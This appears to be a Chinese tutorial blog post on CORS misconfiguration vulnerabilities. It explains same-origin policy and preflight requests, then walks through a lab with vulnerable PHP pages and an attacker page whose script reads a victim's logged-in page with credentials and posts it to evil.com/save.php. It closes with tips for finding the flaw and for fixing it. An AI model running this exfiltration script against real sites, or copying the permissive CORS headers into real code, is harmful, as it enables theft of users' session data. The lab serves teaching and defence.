CORS跨域资源共享漏洞

目录

同源策略

解决跨域问题的方案

CORS

CORS原理

CORS漏洞攻击流程

CORS漏洞案例演示

CORS漏洞挖掘思考

漏洞危害

漏洞修复


跨域资源共享 (CORS) 是一种浏览器机制,可以对位于给定域之外的资源进行受控访问。它扩展并增加了同源策略 ( SOP ) 的灵活性。但是,如果网站的 CORS 策略配置和实施不当,它也会为基于跨域的攻击提供可能性。既然是跨域,那就先说说不跨域吧即同源策略

同源策略

SOP,同源策略 (Same Origin Policy),该策略是浏览器的一个安全基石,如果没有同源策略,那么,你打开了一个合法网站,又打开了一个恶意网站。恶意网站的脚本能够随意的操作合法网站的任何可操作资源,没有任何限制。

浏览器的同源策略规定:不同域的客户端脚本在没有明确授权的情况下,不能读写对方的资源。那么何为同源呢,即两个站点需要满足同协议,同域名,同端口这三个条件。

SOP是一个很好的策略,但是随着Web应用的发展,网站由于自身业务的需求,需要实现一些跨域的功能,能够让不同域的页面之间能够相互访问各自页面的内容。那什么是跨域了,跨域是指跨域名的访问,以下情况都属于跨域:

跨域原因说明示例
域名不同www.jd.comwww.taobao.com
域名相同,端口不同www.jd.com:8080www.jd.com:8081
二级域名不同item.jd.commiaosha.jd.com

如果域名和端口都相同,但是请求路径不同,不属于跨域,如:

  • www.jd.com/item
  • www.jd.com/goods

跨域访问的一些场景

        1.比如后端开发完一部分业务代码后,提供接口给前端用,在前后端分离的模式下,前后端的域名是不一致的,此时就会发生跨域访问的问题。

        2.程序员在本地做开发,本地的文件夹并不是在一个域下面,当一个文件需要发送ajax请求,请求另外一个页面的内容的时候,就会跨域。

        3.电商网站想通过用户浏览器加载第三方快递网站的物流信息。

        4.子站域名希望调用主站域名的用户资料接口,并将数据显示出来。

跨域问题

跨域不一定会有跨域问题。因为跨域问题是浏览器对于ajax请求的一种安全限制:一个页面发起的ajax请求,只能是于当前页同域名的路径,这能有效的阻止跨站攻击。

因此:跨域问题 是针对ajax的一种限制

但是这却给我们的开发带来了不变,而且在实际生产环境中,肯定会有很多台服务器之间交互,地址和端口都可能不同,怎么办?

解决跨域问题的方案

  • Jsonp

        最早的解决方案,利用script标签可以跨域的原理实现。

        限制:

                需要服务的支持

                只能发起GET请求

  • nginx反向代理

    思路是:利用nginx反向代理把跨域为不跨域,支持各种请求方式

    缺点:需要在nginx进行额外配置,语义不清晰

  • CORS

    规范化的跨域请求解决方案,安全可靠。

    优势:

    • 在服务端进行控制是否允许跨域,可自定义规则
    • 支持各种请求方式

    缺点:

    • 会产生额外的请求

我们这里会采用cors的跨域方案。

CORS

CORS,跨域资源共享(Cross-origin resource sharing),是H5提供的一种机制,它允许浏览器向跨源服务器,发出XMLHttpRequest请求,从而克服了AJAX只能同源使用的限制。

CORS需要浏览器和服务器同时支持。目前,所有浏览器都支持该功能,IE浏览器不能低于IE10。

  • 浏览器端:

    目前,所有浏览器都支持该功能(IE10以下不行)。整个CORS通信过程,都是浏览器自动完成,不需要用户参与。

  • 服务端:

    CORS通信与AJAX没有任何差别,因此你不需要改变以前的业务逻辑。只不过,浏览器会在请求中携带一些头信息,我们需要以此判断是否运行其跨域,然后在响应头中加入一些信息即可。这一般通过过滤器完成即可。

CORS原理

浏览器会将ajax请求分为两类,其处理方案略有差异:简单请求、特殊请求。

简单请求

只要同时满足以下两大条件,就属于简单请求。:

(1) 请求方法是以下三种方法之一:

  • HEAD
  • GET
  • POST

(2)HTTP的头信息不超出以下几种字段:

  • Accept
  • Accept-Language
  • Content-Language
  • Last-Event-ID
  • Content-Type:只限于三个值application/x-www-form-urlencodedmultipart/form-datatext/plain

当浏览器发现ajax请求是简单请求时,会在请求头中携带一个字段:Origin.

Origin中会指出当前请求属于哪个域(协议+域名+端口)。服务器会根据这个值决定是否允许其跨域。

Access-Control-Allow-Origin: http://xxxx.com
Access-Control-Allow-Credentials: true
Content-Type: text/html; charset=utf-8
  • Access-Control-Allow-Origin:可接受的域,是一个具体域名或者*,代表任意
  • Access-Control-Allow-Credentials:是否允许携带cookie,默认情况下,cors不会携带cookie,除非这个值是true

注意:

如果跨域请求要想操作cookie,需要满足3个条件:

  • 服务的响应头中需要携带Access-Control-Allow-Credentials并且为true。
  • 浏览器发起ajax需要指定withCredentials 为true
  • 响应头中的Access-Control-Allow-Origin一定不能为*,必须是指定的域名

特殊请求

不符合简单请求的条件,会被浏览器判定为特殊请求,,例如请求方式为PUT。

预检请求

特殊请求会在正式通信之前,增加一次HTTP查询请求,称为"预检"请求(preflight)。

浏览器先询问服务器,当前网页所在的域名是否在服务器的许可名单之中,以及可以使用哪些HTTP动词和头信息字段。只有得到肯定答复,浏览器才会发出正式的XMLHttpRequest请求,否则就报错。

一个“预检”请求的样板:

OPTIONS /cors HTTP/1.1
Origin: http://manage.leyou.com
Access-Control-Request-Method: PUT
Access-Control-Request-Headers: X-Custom-Header
Host: api.leyou.com
Accept-Language: en-US
Connection: keep-alive
User-Agent: Mozilla/5.0...

与简单请求相比,除了Origin以外,多了两个头:

  • Access-Control-Request-Method:接下来会用到的请求方式,比如PUT
  • Access-Control-Request-Headers:会额外用到的头信息

服务器对预检请求的响应

服务收到预检请求,如果许可跨域,会发出响应:

HTTP/1.1 200 OK
Date: Mon, 01 Dec 2008 01:15:39 GMT
Server: Apache/2.0.61 (Unix)
Access-Control-Allow-Origin: http://manage.leyou.com
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, POST, PUT
Access-Control-Allow-Headers: X-Custom-Header
Access-Control-Max-Age: 1728000
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/plain

除了Access-Control-Allow-OriginAccess-Control-Allow-Credentials以外,这里又额外多出3个头:

  • Access-Control-Allow-Methods:允许访问的方式
  • Access-Control-Allow-Headers:允许携带的头
  • Access-Control-Max-Age:本次许可的有效时长,单位是秒,过期之前的ajax请求就无需再次进行预检了

如果浏览器得到上述响应,则认定为可以跨域,后续就跟简单请求的处理是一样的了。

CORS漏洞攻击流程

知道原理之后,我们看看CORS跨域导致用户信息泄漏是如何发生的

  1. 假设用户登陆一个含有CORS配置网站vuln.com,同时又访问了攻击者提供的一个链接evil.com。
  2. evil.com的网站向vuln.com这个网站发起请求获取敏感数据,浏览器能否接收信息取决于vuln.com的配置。
  3. 如果vuln.com配置了Access-Control-Allow-Origin头且为预期,那么允许接收,否则浏览器会因为同源策略而不接收。

CORS漏洞案例演示

要想真正的清楚漏洞的原理,必须通过实验来理解!下面通过简单的代码来演示这个漏洞的发生过程。

192.168.43.52      www.vuln.com         存在cors漏洞的网站
192.168.110.129  www.eval.com         hacker接收受害者网站cookie的站点

我们知道cookie设置httponly属性后,没办法被js读取,关于httponly传送门-》XSS漏洞获取cookie,我们把phpinfo页面当成是www.vlun.com上的用户信息。 模拟用户登陆www.vuln.com/login.php,登录成功后跳转到www.vuln.com/secrect.php。

1. www.vuln.com ,存在cors漏洞的网站搭建

  • login.php     登录页面
  • check.php   判断是否成功登陆的页面,成功登陆后返回cookie
  • secret.php   登录成功后进入的页面,即用户的敏感信息所在页面

login.php

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>欢迎来到完美世界,请先进行登陆</title>
</head>
<body>
    <form action="check.php" method="post">
        用户名:<input type="text" name="name2">
        密码:  <input type="password" name="pass2">
        <input type="submit" value="登录">
    </form>
</body>
</html>

check.php

成功登陆后返回带有有httponly属性的cookie

<?php
    header("Content-type:text/html;charset=utf-8");    #解决php中中文乱码问题
	$a = "THISISSESSID20180802";
	$b = "THISISSESSIDhttponly20180802";
    if(!isset($_COOKIE['SESSIONid']) and !isset($_COOKIE['test_http'])){       #如果没有携带cookie则说明没有登陆,进入如下
        echo "<br/>";
		if(empty($_POST)){   #如果没有点击提交
			echo "<a href='index.php'>请先登录系统</a>";
		}else{    #否则的话说明进行了提交
			$name = $_POST["name2"];
			$pass = $_POST["pass2"];
			if($name == "admin" && $pass == "123456"){   #如果帐号密码正确则返回自定义cookie值
				echo "用户名密码正确";
				#setcookie("SESSIONid",$a,0,"","",0);  //设置普通Cookie
				setcookie("SESSIONid",$a,0,"","",0,1);//设置HttpOnly Cookie
                #setcoookie第三个值为0时,代表浏览器退出则cookie失效,第七个值代表是否设置httponly,值为1时代表设置
				header("Location: secret.php");      #直接进行一个跳转
			}else{
				echo "用户名或密码错误";
				echo "<a href='index.php'>请登录</a>";
		   }
		}
		
	}else{
		header("Location: secret.php"); 
	}
?>

secret.php

现在前两行代码是注释掉的

<?php
	header("Content-type:text/html;charset=utf-8"); 
    if(!isset($_COOKIE['SESSIONid'])){       #如果直接访问这个则拒绝
        echo "<br/>";
        echo "<a href='index.php'>请先登录系统</a>";
    }else{
        //header("Access-Control-Allow-Origin:http://192.168.110.129");
        //header("Access-Control-Allow-Credentials:true");
        phpinfo();
    }
?>

受害者正常登录了www.vuln.com网站

2. 受害者登录网站后,不小心点击了恶意网站www.eval.com/CORS/steal.html链接

该代码

<!DOCTYPE>
<html>
<h1>Hello I evil page. </h1>
<script type="text/javascript">
function loadXMLDoc()
{
   var xhr1;
   var xhr2;
   if(window.XMLHttpRequest)
   {
       xhr1 = new XMLHttpRequest();
       xhr2 = new XMLHttpRequest();
   }
   else
   {
       xhr1 = new ActiveXObject("Microsoft.XMLHTTP");
       xhr2= new ActiveXObject("Microsoft.XMLHTTP");
   }
   xhr1.onreadystatechange=function()
   {
       if(xhr1.readyState == 4 && xhr1.status == 200) //if receive xhr1 response
       {
           var datas=xhr1.responseText;
           xhr2.open("POST","http://www.evil.com/save.php","true");
           xhr2.setRequestHeader("Content-type","application/x-www-form-urlencoded");
           xhr2.send("T1="+escape(datas));      
       }
   }
   xhr1.open("GET","http://www.vuln.com/CORS/secret.php","true") //request user page.
   xhr1.withCredentials = true;        //request with cookie
   xhr1.send();
}
loadXMLDoc();
</script>
</html>

然后访问 http://www.eval.com/CORS/steal.html ,由于请求是从www.evil.com发出的,通过AJAX请求www.vuln.com的资源,所以,浏览器自动为我们加上了Origin这个字段。

 而且我们可以发现,www.vuln.com/secrect.php这个请求其实是有返回内容的。

3. 浏览器进行跨域拦截

但是到了浏览器这边,却没有继续请求将返回的内容发送到www.evil.com/CORS/save.php,是因为浏览器拦截了该请求,提示没有CORS的头Access-Control-Allow-Origin。

4. 允许跨域请求 

去除www.vuln.com/secrect.php的注释

<?php
	header("Content-type:text/html;charset=utf-8"); 
    if(!isset($_COOKIE['SESSIONid'])){       #如果直接访问这个则拒绝
        echo "<br/>";
        echo "<a href='index.php'>请先登录系统</a>";
    }else{
        header("Access-Control-Allow-Origin:http://www.evil.com");
        header("Access-Control-Allow-Credentials:true");
        phpinfo();
    }
?>

抓包发现请求www.vuln.com/CORS/secrect.php发现了对应的响应头。Access-Control-Allow-Origin指是允许访问的源,Access-Control-Allow-Credentials指的是允许带上cookie访问资源。这样浏览器就不会出错而拦截请求了,然后接着把受害则登录后的信息发送到www.evil.com/CORS/save.php去。

 save.php将接受到的信息保存在secret.html中,漏洞利用成功

 思考:

如果我们将代码secrect.php代码中的修改成别的域名了,如下

header("Access-Control-Allow-Origin:https://www.baidu.com");

我们再次请求,发现浏览器提示同源策略禁止读取位于 http://www.vuln.com/CORS/secret.php 的远程资源。(原因:CORS 头 'Access-Control-Allow-Origin' 不匹配,即漏洞服务器允许被请求的源服务器为baidu.com,而这里的origin为eval.com,不在所允许的范围内,所以拒绝将信息发送到hacker的服务器上。

 要是我将如下改为*了, * 表示该资源谁都可以用

header("Access-Control-Allow-Origin:*");

在文章上面说了

 所以再次尝漏洞试利用,漏洞依然利用不成功

 将Access-Control-Allow-Origin设置为*不是允许任意源访问吗为什么还是会产生跨域问题了?

原因:在CORS中,Credential不接受http响应首部中的‘Access-Control-Allow-Origin’设置为通配符‘*’。这与使用credentials相悖。

CORS漏洞挖掘思考

我们平时该怎么去挖掘这种漏洞了?可以分两步

1. 查看响应头

查看ACAO响应头是否为具体的值以及ACAC响应头是否为true,如果是则判断是否对源进行限制

Access-Control-Allow-Origin: http://www.eval.com
Access-Control-Allow-Credentials: true

 2. 判断是否对源进行限制

我们将origin修改为任意的站定,查看返回的ACAO头是否变成和我们修改成的站点一样,如果是,则可能存在CORS跨域资源共享。如下修改为baidu,ACAO也变为baidu,可能存在跨域问题。

3. 判断是否对Referer值进行校验,或者是否添加token

如下站点,上面说的那两个判断条件都成立,去除referer字段也没问题,但是这里存在token值

 当我们把token值去掉时,显示登录过期,所以此cors漏洞无法利用 

漏洞危害

经过上面的实验,我们知道如果一个页面存在cors漏洞那么可能:

1 . 敏感信息泄露

站点存在CORS共享问题,那么如果内部网络用户访问了恶意站点,恶意站点可以通过跨域请求来获取到内部站点的信息及cookie等凭证信息

漏洞修复

CORS漏洞主要是由于配置错误而引起的,可以配置Access-Control-Allow-Origin标头中指定的来源为受信任的站点

参考:CORS跨域漏洞的学习_weixin_45116657的博客-CSDN博客_cors跨域漏洞

CORS(Cross-Origin Resource Sharing)是一种资源共享机制。它允许web应用程序向其他名、协议、端口不同)请求资源,比如调用第三方API接口。CORS由浏览器实现,它通过HTTP头部来告诉浏览器哪些请求是安全的。CORS资源共享漏洞指的是攻击者利用CORS机制的漏洞获取敏感信息或进行恶意操作。 CORS资源共享漏洞的原理是:当一个网站想要向另一个名的服务器发起请求时,浏览器会先向服务器发送一个OPTIONS请求,询问服务器是否允许该网站请求。如果服务器允许,则浏览器会发送真正的请求。攻击者可以通过构造特定的请求,绕过浏览器的CORS机制,从而获取敏感信息或进行恶意操作。 常见的CORS资源共享漏洞包括: 1.未正确配置Access-Control-Allow-Origin头部,导致攻击者可以访问敏感接口。 2.使用通配符“*”来允许所有请求,导致攻击者可以利用其他网站的漏洞来攻击目标网站。 3.未正确限制Access-Control-Allow-Methods头部,导致攻击者可以使用其他HTTP方法来调用敏感接口。 4.未正确限制Access-Control-Allow-Headers头部,导致攻击者可以发送任意HTTP头部来调用敏感接口。 要防范CORS资源共享漏洞,可以采取以下措施: 1.正确配置Access-Control-Allow-Origin、Access-Control-Allow-Methods和Access-Control-Allow-Headers头部,只允许必要的名、HTTP方法和HTTP头部访问敏感接口。 2.对敏感接口进行身份验证和授权,只允许授权用户访问。 3.限制请求的频率和流量,避免恶意攻击。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值